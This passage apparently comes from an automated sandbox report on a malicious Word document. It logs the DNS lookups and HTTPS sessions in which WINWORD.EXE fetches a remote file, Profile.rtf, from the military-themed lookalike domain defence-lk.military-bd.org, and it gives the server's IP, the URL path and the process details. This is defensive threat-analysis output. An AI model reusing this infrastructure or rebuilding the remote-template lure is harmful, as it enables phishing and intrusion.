    Dec 13, 2024 12:11:00.183146000 CET49173443192.168.2.225.255.125.140
    Dec 13, 2024 12:11:00.183191061 CET443491735.255.125.140192.168.2.22
    Dec 13, 2024 12:11:00.183324099 CET49173443192.168.2.225.255.125.140
    Dec 13, 2024 12:11:00.183695078 CET49173443192.168.2.225.255.125.140
    Dec 13, 2024 12:11:00.183703899 CET443491735.255.125.140192.168.2.22
    Dec 13, 2024 12:11:01.549206018 CET443491735.255.125.140192.168.2.22
    Dec 13, 2024 12:11:01.549309969 CET49173443192.168.2.225.255.125.140
    Dec 13, 2024 12:11:01.553690910 CET49173443192.168.2.225.255.125.140
    Dec 13, 2024 12:11:01.553720951 CET443491735.255.125.140192.168.2.22
    Dec 13, 2024 12:11:01.554039001 CET443491735.255.125.140192.168.2.22
    Dec 13, 2024 12:11:01.556166887 CET49173443192.168.2.225.255.125.140
    Dec 13, 2024 12:11:01.603324890 CET443491735.255.125.140192.168.2.22
    Dec 13, 2024 12:11:02.085154057 CET443491735.255.125.140192.168.2.22
    Dec 13, 2024 12:11:02.085228920 CET443491735.255.125.140192.168.2.22
    Dec 13, 2024 12:11:02.085270882 CET49173443192.168.2.225.255.125.140
    Dec 13, 2024 12:11:02.085341930 CET49173443192.168.2.225.255.125.140
    Dec 13, 2024 12:11:02.085357904 CET443491735.255.125.140192.168.2.22
    Dec 13, 2024 12:11:02.092824936 CET49174443192.168.2.225.255.125.140
    Dec 13, 2024 12:11:02.092863083 CET443491745.255.125.140192.168.2.22
    Dec 13, 2024 12:11:02.092916965 CET49174443192.168.2.225.255.125.140
    Dec 13, 2024 12:11:02.093319893 CET49174443192.168.2.225.255.125.140
    Dec 13, 2024 12:11:02.093331099 CET443491745.255.125.140192.168.2.22
    Dec 13, 2024 12:11:03.456159115 CET443491745.255.125.140192.168.2.22
    Dec 13, 2024 12:11:03.456907034 CET49174443192.168.2.225.255.125.140
    Dec 13, 2024 12:11:03.458378077 CET49174443192.168.2.225.255.125.140
    Dec 13, 2024 12:11:03.458384037 CET443491745.255.125.140192.168.2.22
    Dec 13, 2024 12:11:03.459718943 CET49174443192.168.2.225.255.125.140
    Dec 13, 2024 12:11:03.459723949 CET443491745.255.125.140192.168.2.22
    Dec 13, 2024 12:11:04.001975060 CET443491745.255.125.140192.168.2.22
    Dec 13, 2024 12:11:04.002052069 CET49174443192.168.2.225.255.125.140
    Dec 13, 2024 12:11:04.002059937 CET443491745.255.125.140192.168.2.22
    Dec 13, 2024 12:11:04.002091885 CET443491745.255.125.140192.168.2.22
    Dec 13, 2024 12:11:04.002100945 CET49174443192.168.2.225.255.125.140
    Dec 13, 2024 12:11:04.002129078 CET49174443192.168.2.225.255.125.140
    Dec 13, 2024 12:11:04.003289938 CET49174443192.168.2.225.255.125.140
    Dec 13, 2024 12:11:04.003304005 CET443491745.255.125.140192.168.2.22
    Dec 13, 2024 12:11:04.020936966 CET49175443192.168.2.225.255.125.140
    Dec 13, 2024 12:11:04.020983934 CET443491755.255.125.140192.168.2.22
    Dec 13, 2024 12:11:04.021034002 CET49175443192.168.2.225.255.125.140
    Dec 13, 2024 12:11:04.026241064 CET49175443192.168.2.225.255.125.140
    Dec 13, 2024 12:11:04.026253939 CET443491755.255.125.140192.168.2.22
    Dec 13, 2024 12:11:05.390048027 CET443491755.255.125.140192.168.2.22
    Dec 13, 2024 12:11:05.391343117 CET49175443192.168.2.225.255.125.140
    Dec 13, 2024 12:11:05.393696070 CET49175443192.168.2.225.255.125.140
    Dec 13, 2024 12:11:05.393706083 CET443491755.255.125.140192.168.2.22
    Dec 13, 2024 12:11:05.399717093 CET49175443192.168.2.225.255.125.140
    Dec 13, 2024 12:11:05.399741888 CET443491755.255.125.140192.168.2.22
    Dec 13, 2024 12:11:05.924756050 CET443491755.255.125.140192.168.2.22
    Dec 13, 2024 12:11:05.924864054 CET443491755.255.125.140192.168.2.22
    Dec 13, 2024 12:11:05.924958944 CET49175443192.168.2.225.255.125.140
    Dec 13, 2024 12:11:05.924958944 CET49175443192.168.2.225.255.125.140
    Dec 13, 2024 12:11:05.924985886 CET49175443192.168.2.225.255.125.140
    Dec 13, 2024 12:11:05.925004959 CET443491755.255.125.140192.168.2.22
    Dec 13, 2024 12:11:05.925020933 CET49175443192.168.2.225.255.125.140
    Dec 13, 2024 12:11:05.925055981 CET49175443192.168.2.225.255.125.140

    UDP Packets

    TimestampSource PortDest PortSource IPDest IP
    Dec 13, 2024 12:10:29.773616076 CET5456253192.168.2.228.8.8.8
    Dec 13, 2024 12:10:30.285824060 CET53545628.8.8.8192.168.2.22
    Dec 13, 2024 12:10:33.164014101 CET5291753192.168.2.228.8.8.8
    Dec 13, 2024 12:10:33.677314043 CET53529178.8.8.8192.168.2.22
    Dec 13, 2024 12:10:33.679138899 CET6275153192.168.2.228.8.8.8
    Dec 13, 2024 12:10:34.222779036 CET53627518.8.8.8192.168.2.22
    Dec 13, 2024 12:10:39.332797050 CET5789353192.168.2.228.8.8.8
    Dec 13, 2024 12:10:39.505675077 CET53578938.8.8.8192.168.2.22
    Dec 13, 2024 12:10:39.507448912 CET5482153192.168.2.228.8.8.8
    Dec 13, 2024 12:10:39.875825882 CET53548218.8.8.8192.168.2.22
    Dec 13, 2024 12:10:47.641995907 CET5471953192.168.2.228.8.8.8
    Dec 13, 2024 12:10:48.011981964 CET53547198.8.8.8192.168.2.22
    Dec 13, 2024 12:10:48.014941931 CET4988153192.168.2.228.8.8.8
    Dec 13, 2024 12:10:48.370584011 CET53498818.8.8.8192.168.2.22
    Dec 13, 2024 12:10:59.911575079 CET5499853192.168.2.228.8.8.8
    Dec 13, 2024 12:11:00.046056986 CET53549988.8.8.8192.168.2.22
    Dec 13, 2024 12:11:00.048675060 CET5278153192.168.2.228.8.8.8
    Dec 13, 2024 12:11:00.182604074 CET53527818.8.8.8192.168.2.22

    DNS Queries

    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
    Dec 13, 2024 12:10:29.773616076 CET192.168.2.228.8.8.80xbe18Standard query (0)defence-lk.military-bd.orgA (IP address)IN (0x0001)false
    Dec 13, 2024 12:10:33.164014101 CET192.168.2.228.8.8.80x52aaStandard query (0)defence-lk.military-bd.orgA (IP address)IN (0x0001)false
    Dec 13, 2024 12:10:33.679138899 CET192.168.2.228.8.8.80x2a10Standard query (0)defence-lk.military-bd.orgA (IP address)IN (0x0001)false
    Dec 13, 2024 12:10:39.332797050 CET192.168.2.228.8.8.80xc083Standard query (0)defence-lk.military-bd.orgA (IP address)IN (0x0001)false
    Dec 13, 2024 12:10:39.507448912 CET192.168.2.228.8.8.80x1100Standard query (0)defence-lk.military-bd.orgA (IP address)IN (0x0001)false
    Dec 13, 2024 12:10:47.641995907 CET192.168.2.228.8.8.80xd005Standard query (0)defence-lk.military-bd.orgA (IP address)IN (0x0001)false
    Dec 13, 2024 12:10:48.014941931 CET192.168.2.228.8.8.80x1639Standard query (0)defence-lk.military-bd.orgA (IP address)IN (0x0001)false
    Dec 13, 2024 12:10:59.911575079 CET192.168.2.228.8.8.80x3e0Standard query (0)defence-lk.military-bd.orgA (IP address)IN (0x0001)false
    Dec 13, 2024 12:11:00.048675060 CET192.168.2.228.8.8.80x69dcStandard query (0)defence-lk.military-bd.orgA (IP address)IN (0x0001)false

    DNS Answers

    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
    Dec 13, 2024 12:10:30.285824060 CET8.8.8.8192.168.2.220xbe18No error (0)defence-lk.military-bd.org5.255.125.140A (IP address)IN (0x0001)false
    Dec 13, 2024 12:10:33.677314043 CET8.8.8.8192.168.2.220x52aaNo error (0)defence-lk.military-bd.org5.255.125.140A (IP address)IN (0x0001)false
    Dec 13, 2024 12:10:34.222779036 CET8.8.8.8192.168.2.220x2a10No error (0)defence-lk.military-bd.org5.255.125.140A (IP address)IN (0x0001)false
    Dec 13, 2024 12:10:39.505675077 CET8.8.8.8192.168.2.220xc083No error (0)defence-lk.military-bd.org5.255.125.140A (IP address)IN (0x0001)false
    Dec 13, 2024 12:10:39.875825882 CET8.8.8.8192.168.2.220x1100No error (0)defence-lk.military-bd.org5.255.125.140A (IP address)IN (0x0001)false
    Dec 13, 2024 12:10:48.011981964 CET8.8.8.8192.168.2.220xd005No error (0)defence-lk.military-bd.org5.255.125.140A (IP address)IN (0x0001)false
    Dec 13, 2024 12:10:48.370584011 CET8.8.8.8192.168.2.220x1639No error (0)defence-lk.military-bd.org5.255.125.140A (IP address)IN (0x0001)false
    Dec 13, 2024 12:11:00.046056986 CET8.8.8.8192.168.2.220x3e0No error (0)defence-lk.military-bd.org5.255.125.140A (IP address)IN (0x0001)false
    Dec 13, 2024 12:11:00.182604074 CET8.8.8.8192.168.2.220x69dcNo error (0)defence-lk.military-bd.org5.255.125.140A (IP address)IN (0x0001)false

    HTTP Request Dependency Graph

    • defence-lk.military-bd.org

    HTTPS Proxied Packets

    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    0192.168.2.22491615.255.125.1404433432C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    TimestampBytes transferredDirectionData
    2024-12-13 11:10:32 UTC174OUTOPTIONS /MedicalGrantForm/11d601c6/ HTTP/1.1
    User-Agent: Microsoft Office Protocol Discovery
    Host: defence-lk.military-bd.org
    Content-Length: 0
    Connection: Keep-Alive
    2024-12-13 11:10:32 UTC232INHTTP/1.1 405 Method Not Allowed
    Server: nginx
    Date: Fri, 13 Dec 2024 11:10:32 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 196
    Connection: close
    X-Robots-Tag: noindex, nofollow
    Access-Control-Allow-Origin: *
    2024-12-13 11:10:32 UTC196INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>405 Method Not Allowed</title></head><body bgcolor="white"><center><h1>405 Method Not Allowed</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    1192.168.2.22491625.255.125.1404433432C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    TimestampBytes transferredDirectionData
    2024-12-13 11:10:35 UTC164OUTHEAD /MedicalGrantForm/11d601c6/Profile.rtf HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Microsoft Office Existence Discovery
    Host: defence-lk.military-bd.org
    2024-12-13 11:10:36 UTC232INHTTP/1.1 405 Method Not Allowed
    Server: nginx
    Date: Fri, 13 Dec 2024 11:10:35 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 196
    Connection: close
    X-Robots-Tag: noindex, nofollow
    Access-Control-Allow-Origin: *


    Session IDSource IPSource PortDestination IPDestination Port
    2192.168.2.22491635.255.125.140443
    TimestampBytes transferredDirectionData
    2024-12-13 11:10:41 UTC168OUTOPTIONS /MedicalGrantForm/11d601c6 HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
    translate: f
    Host: defence-lk.military-bd.org
    2024-12-13 11:10:41 UTC232INHTTP/1.1 405 Method Not Allowed
    Server: nginx
    Date: Fri, 13 Dec 2024 11:10:41 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 196
    Connection: close
    X-Robots-Tag: noindex, nofollow
    Access-Control-Allow-Origin: *
    2024-12-13 11:10:41 UTC196INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>405 Method Not Allowed</title></head><body bgcolor="white"><center><h1>405 Method Not Allowed</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    3192.168.2.22491645.255.125.1404433432C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    TimestampBytes transferredDirectionData
    2024-12-13 11:10:43 UTC394OUTGET /MedicalGrantForm/11d601c6/Profile.rtf HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    Host: defence-lk.military-bd.org
    Connection: Keep-Alive
    2024-12-13 11:10:43 UTC205INHTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 13 Dec 2024 11:10:43 GMT
    Content-Type: application/rtf
    Content-Length: 8
    Connection: close
    X-Robots-Tag: noindex, nofollow
    Access-Control-Allow-Origin: *
    2024-12-13 11:10:43 UTC8INData Raw: 7b 5c 72 74 66 31 20 7d
    Data Ascii: {\rtf1 }


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    4192.168.2.22491655.255.125.1404433432C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    TimestampBytes transferredDirectionData
    2024-12-13 11:10:45 UTC183OUTHEAD /MedicalGrantForm/11d601c6/Profile.rtf HTTP/1.1
    User-Agent: Microsoft Office Existence Discovery
    Host: defence-lk.military-bd.org
    Content-Length: 0
    Connection: Keep-Alive
    2024-12-13 11:10:45 UTC232INHTTP/1.1 405 Method Not Allowed
    Server: nginx
    Date: Fri, 13 Dec 2024 11:10:45 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 196
    Connection: close
    X-Robots-Tag: noindex, nofollow
    Access-Control-Allow-Origin: *


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    5192.168.2.22491665.255.125.1404433432C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    TimestampBytes transferredDirectionData
    2024-12-13 11:10:47 UTC174OUTOPTIONS /MedicalGrantForm/11d601c6/ HTTP/1.1
    User-Agent: Microsoft Office Protocol Discovery
    Host: defence-lk.military-bd.org
    Content-Length: 0
    Connection: Keep-Alive
    2024-12-13 11:10:47 UTC232INHTTP/1.1 405 Method Not Allowed
    Server: nginx
    Date: Fri, 13 Dec 2024 11:10:47 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 196
    Connection: close
    X-Robots-Tag: noindex, nofollow
    Access-Control-Allow-Origin: *
    2024-12-13 11:10:47 UTC196INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>405 Method Not Allowed</title></head><body bgcolor="white"><center><h1>405 Method Not Allowed</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    6192.168.2.22491675.255.125.1404433432C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    TimestampBytes transferredDirectionData
    2024-12-13 11:10:49 UTC164OUTHEAD /MedicalGrantForm/11d601c6/Profile.rtf HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Microsoft Office Existence Discovery
    Host: defence-lk.military-bd.org
    2024-12-13 11:10:50 UTC232INHTTP/1.1 405 Method Not Allowed
    Server: nginx
    Date: Fri, 13 Dec 2024 11:10:50 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 196
    Connection: close
    X-Robots-Tag: noindex, nofollow
    Access-Control-Allow-Origin: *


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    7192.168.2.22491685.255.125.1404433432C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    TimestampBytes transferredDirectionData
    2024-12-13 11:10:51 UTC394OUTGET /MedicalGrantForm/11d601c6/Profile.rtf HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    Host: defence-lk.military-bd.org
    Connection: Keep-Alive
    2024-12-13 11:10:52 UTC205INHTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 13 Dec 2024 11:10:51 GMT
    Content-Type: application/rtf
    Content-Length: 8
    Connection: close
    X-Robots-Tag: noindex, nofollow
    Access-Control-Allow-Origin: *
    2024-12-13 11:10:52 UTC8INData Raw: 7b 5c 72 74 66 31 20 7d
    Data Ascii: {\rtf1 }


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    8192.168.2.22491695.255.125.1404433432C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    TimestampBytes transferredDirectionData
    2024-12-13 11:10:53 UTC183OUTHEAD /MedicalGrantForm/11d601c6/Profile.rtf HTTP/1.1
    User-Agent: Microsoft Office Existence Discovery
    Host: defence-lk.military-bd.org
    Content-Length: 0
    Connection: Keep-Alive
    2024-12-13 11:10:54 UTC232INHTTP/1.1 405 Method Not Allowed
    Server: nginx
    Date: Fri, 13 Dec 2024 11:10:53 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 196
    Connection: close
    X-Robots-Tag: noindex, nofollow
    Access-Control-Allow-Origin: *


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    9192.168.2.22491705.255.125.1404433432C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    TimestampBytes transferredDirectionData
    2024-12-13 11:10:55 UTC174OUTOPTIONS /MedicalGrantForm/11d601c6/ HTTP/1.1
    User-Agent: Microsoft Office Protocol Discovery
    Host: defence-lk.military-bd.org
    Content-Length: 0
    Connection: Keep-Alive
    2024-12-13 11:10:56 UTC232INHTTP/1.1 405 Method Not Allowed
    Server: nginx
    Date: Fri, 13 Dec 2024 11:10:55 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 196
    Connection: close
    X-Robots-Tag: noindex, nofollow
    Access-Control-Allow-Origin: *
    2024-12-13 11:10:56 UTC196INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>405 Method Not Allowed</title></head><body bgcolor="white"><center><h1>405 Method Not Allowed</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    10192.168.2.22491715.255.125.1404433432C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    TimestampBytes transferredDirectionData
    2024-12-13 11:10:57 UTC174OUTOPTIONS /MedicalGrantForm/11d601c6/ HTTP/1.1
    User-Agent: Microsoft Office Protocol Discovery
    Host: defence-lk.military-bd.org
    Content-Length: 0
    Connection: Keep-Alive
    2024-12-13 11:10:57 UTC232INHTTP/1.1 405 Method Not Allowed
    Server: nginx
    Date: Fri, 13 Dec 2024 11:10:57 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 196
    Connection: close
    X-Robots-Tag: noindex, nofollow
    Access-Control-Allow-Origin: *
    2024-12-13 11:10:57 UTC196INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>405 Method Not Allowed</title></head><body bgcolor="white"><center><h1>405 Method Not Allowed</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    11192.168.2.22491725.255.125.1404433432C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    TimestampBytes transferredDirectionData
    2024-12-13 11:10:59 UTC174OUTOPTIONS /MedicalGrantForm/11d601c6/ HTTP/1.1
    User-Agent: Microsoft Office Protocol Discovery
    Host: defence-lk.military-bd.org
    Content-Length: 0
    Connection: Keep-Alive
    2024-12-13 11:10:59 UTC232INHTTP/1.1 405 Method Not Allowed
    Server: nginx
    Date: Fri, 13 Dec 2024 11:10:59 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 196
    Connection: close
    X-Robots-Tag: noindex, nofollow
    Access-Control-Allow-Origin: *
    2024-12-13 11:10:59 UTC196INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>405 Method Not Allowed</title></head><body bgcolor="white"><center><h1>405 Method Not Allowed</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    12192.168.2.22491735.255.125.1404433432C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    TimestampBytes transferredDirectionData
    2024-12-13 11:11:01 UTC164OUTHEAD /MedicalGrantForm/11d601c6/Profile.rtf HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Microsoft Office Existence Discovery
    Host: defence-lk.military-bd.org
    2024-12-13 11:11:02 UTC232INHTTP/1.1 405 Method Not Allowed
    Server: nginx
    Date: Fri, 13 Dec 2024 11:11:01 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 196
    Connection: close
    X-Robots-Tag: noindex, nofollow
    Access-Control-Allow-Origin: *


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    13192.168.2.22491745.255.125.1404433432C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    TimestampBytes transferredDirectionData
    2024-12-13 11:11:03 UTC394OUTGET /MedicalGrantForm/11d601c6/Profile.rtf HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    Host: defence-lk.military-bd.org
    Connection: Keep-Alive
    2024-12-13 11:11:03 UTC205INHTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 13 Dec 2024 11:11:03 GMT
    Content-Type: application/rtf
    Content-Length: 8
    Connection: close
    X-Robots-Tag: noindex, nofollow
    Access-Control-Allow-Origin: *
    2024-12-13 11:11:03 UTC8INData Raw: 7b 5c 72 74 66 31 20 7d
    Data Ascii: {\rtf1 }


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    14192.168.2.22491755.255.125.1404433432C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    TimestampBytes transferredDirectionData
    2024-12-13 11:11:05 UTC183OUTHEAD /MedicalGrantForm/11d601c6/Profile.rtf HTTP/1.1
    User-Agent: Microsoft Office Existence Discovery
    Host: defence-lk.military-bd.org
    Content-Length: 0
    Connection: Keep-Alive
    2024-12-13 11:11:05 UTC232INHTTP/1.1 405 Method Not Allowed
    Server: nginx
    Date: Fri, 13 Dec 2024 11:11:05 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 196
    Connection: close
    X-Robots-Tag: noindex, nofollow
    Access-Control-Allow-Origin: *


    Statistics

    CPU Usage

    Click to jump to process

    Memory Usage

    Click to jump to process

    High Level Behavior Distribution

    Click to dive into process behavior distribution

    System Behavior

    General

    Target ID:0
    Start time:06:10:26
    Start date:13/12/2024
    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    Wow64 process (32bit):false
    Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
    Imagebase:0x13ffd0000
    File size:1'423'704 bytes
    MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:false

    Disassembly

    No disassembly